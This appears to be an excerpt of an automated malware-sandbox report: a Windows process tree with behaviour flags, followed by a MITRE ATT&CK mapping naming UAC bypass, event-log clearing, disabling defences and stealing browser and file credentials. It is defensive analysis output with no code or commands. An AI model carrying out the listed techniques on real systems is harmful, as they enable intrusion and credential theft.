C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1828

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4056

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4436

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:4740

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1636

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4156

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:5004

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3188

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
PID:2960

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1576

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:2468

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:3656

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2524

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:620

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:3504

C:\Windows\ImmersiveControlPanel\SystemSettings.exe
"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
1⤵
PID:2736

C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
1⤵
PID:1996

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc
1⤵
PID:2684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:5240

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5756

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5808

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AA65DD7C-83AC-48C0-A6FD-9B61FEBF8800}
1⤵
PID:5844

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5780

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1768

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5512
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\.rsrc\MANIFEST\1
  2⤵
  PID:3092

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
PID:6048
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\.reloc
  2⤵
  PID:5856

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:5976

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:5436

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Modify Registry

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

System Information Discovery